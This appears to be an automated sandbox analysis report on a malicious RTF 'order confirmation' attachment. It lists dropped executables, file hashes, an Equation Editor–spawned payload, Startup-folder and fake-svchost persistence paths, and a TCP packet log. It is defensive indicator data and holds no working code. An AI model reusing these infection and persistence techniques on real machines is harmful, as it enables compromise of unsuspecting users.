                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.431160061181642
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3H2G1IAAUMKMPNEXTVFM.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3LZ81X2WO8Z9V4R143KY.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8V1J5S45YAFZD613NLCB.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CUZDEROSP3A3HJR1FH0T.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CY3GXMNVEU96V3BNZTOS.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DVROMKYKWOGS9EVSGTXB.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MTIT9GYF9MZ1HM1KM5FW.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NDI8VKN5ESJ660RZK00L.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P9R3KU5MPRTPH7Q7M1WD.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PGNXWFDP5X4DDXK3RORU.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PJ6YPGRV1GD8PTQL9LFV.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQMPNABY0K5OG854FLRQ.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VGKNL7NXF46SPGFU4DMH.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X1M228ROQIQ3IHOS0OJU.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y4573HUSZC8AOEOMJABO.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                      Process:C:\Users\user\AppData\Roaming\srt.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3777536
                                                      Entropy (8bit):2.5622413210602293
                                                      Encrypted:false
                                                      SSDEEP:768:MnLGH0oPWsQPNIF2wMxBH1R1Cr8h68EyWgloa1muQtN5Cc/5wMhb93IuWl5FeQ1g:YWQ6F2Jf6
                                                      MD5:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      SHA1:2EF9AA9BE30282A264FCA77C52DBC0F77EB09A0F
                                                      SHA-256:F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                                                      SHA-512:E92B6447388BA357D616C04D57C73CEC71166CA241B74DB99C348000F0CDD1B5F89937B81114A27CE800F5F22579F7C86D7C7B6F7E78FA9434615B1231FBC8A8
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Joe Sandbox View:
                                                      • Filename: Order Confirmation.doc, Detection: malicious
                                                      C:\Users\user\AppData\Roaming\srt.exe
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3777536
                                                      Entropy (8bit):2.5622413210602293
                                                      Encrypted:false
                                                      SSDEEP:768:MnLGH0oPWsQPNIF2wMxBH1R1Cr8h68EyWgloa1muQtN5Cc/5wMhb93IuWl5FeQ1g:YWQ6F2Jf6
                                                      MD5:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      SHA1:2EF9AA9BE30282A264FCA77C52DBC0F77EB09A0F
                                                      SHA-256:F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                                                      SHA-512:E92B6447388BA357D616C04D57C73CEC71166CA241B74DB99C348000F0CDD1B5F89937B81114A27CE800F5F22579F7C86D7C7B6F7E78FA9434615B1231FBC8A8
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Joe Sandbox View:
                                                      • Filename: Order Confirmation.doc, Detection: malicious
                                                      C:\Users\user\Desktop\~$der-confirmation.doc__.rtf
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.431160061181642
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                      Malicious:false
                                                      C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                                                      Process:C:\Users\user\AppData\Roaming\srt.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3777536
                                                      Entropy (8bit):2.5622413210602293
                                                      Encrypted:false
                                                      SSDEEP:768:MnLGH0oPWsQPNIF2wMxBH1R1Cr8h68EyWgloa1muQtN5Cc/5wMhb93IuWl5FeQ1g:YWQ6F2Jf6
                                                      MD5:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      SHA1:2EF9AA9BE30282A264FCA77C52DBC0F77EB09A0F
                                                      SHA-256:F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                                                      SHA-512:E92B6447388BA357D616C04D57C73CEC71166CA241B74DB99C348000F0CDD1B5F89937B81114A27CE800F5F22579F7C86D7C7B6F7E78FA9434615B1231FBC8A8
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Joe Sandbox View:
                                                      • Filename: Order Confirmation.doc, Detection: malicious

                                                      Static File Info

                                                      General

                                                      File type:Rich Text Format data, unknown version
                                                      Entropy (8bit):4.501077473190299
                                                      TrID:
                                                      • Rich Text Format (5005/1) 55.56%
                                                      • Rich Text Format (4004/1) 44.44%
                                                      File name:order-confirmation.doc__.rtf
                                                      File size:5082
                                                      MD5:3d081d1bd8aa121b56754528d7b13981
                                                      SHA1:87db49098bc0aa0b88dfa5c7f3954544dd3058df
                                                      SHA256:4435554b4906c5a294e08a579a0bd6e7ae78bd0dcce24a7225a29ab2a731bd28
                                                      SHA512:5376f5904e8780cf94ca240a98649d462c2d61d6222fb538a8e8de85aed995c6ab3ba72c24dbeca067d9587c19e772af424df4d75e7323ea519cbc99bed78b4f
                                                      SSDEEP:96:Kdt9KksmzFk1O0kkMAfnvNqJxlmaPsQ20/89yN+/32e7cfRTbw:MXK4CO0N9fvNQxQ+sQ20EcN82eKRTbw
                                                      File Content Preview:{\rtf8108{\object74080923 74080923 \'' \objlink13327119\objupdate6343720963437209 \objw4254\objh6162{\*\objdata96259 {{{{{{{{{{{{{{{{{{{{{{{{\bin000000 {\*\obj

                                                      File Icon

                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                      Static RTF Info

                                                      Objects

                                                      Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                      0 | 00000104h | | | | | | | | no
                                                      1 | 000000CEh | 2 | embedded | EQUAtIon.3 | 2096 | | | | no

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      May 27, 2021 21:42:24.529793024 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.530621052 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.530666113 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.530720949 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.531646013 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.531698942 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.531748056 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.532568932 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.532612085 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.532671928 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.533535004 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.533576012 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.533641100 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.534606934 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.534648895 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.534720898 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.535473108 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.535593987 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.535665035 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.536425114 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.536464930 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.536526918 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.537420034 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.537462950 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.537533998 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.538397074 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.538440943 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.538500071 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.539381027 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.539422035 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.539482117 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.540352106 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.540394068 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.540510893 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.541296005 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.541333914 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.541404963 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.542283058 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.542325974 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.542408943 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.543256998 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.543313026 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.543406010 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.544199944 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.544240952 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.544317007 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.545288086 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.545326948 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.545387030 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.546158075 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.546201944 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.546267033 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.566157103 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.566200018 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.566327095 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.566641092 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.566689014 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.566745996 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.567466974 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.567511082 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.567575932 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.568515062 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.568557978 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.568618059 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.569406033 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.569447994 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.569518089 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.570317030 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.570374966 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.570560932 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.571863890 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.571908951 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.571975946 CEST49168443192.168.2.22162.159.130.233
                                                      May 27, 2021 21:42:24.572700024 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.572742939 CEST44349168162.159.130.233192.168.2.22
                                                      May 27, 2021 21:42:24.572801113 CEST49168443192.168.2.22162.159.130.233
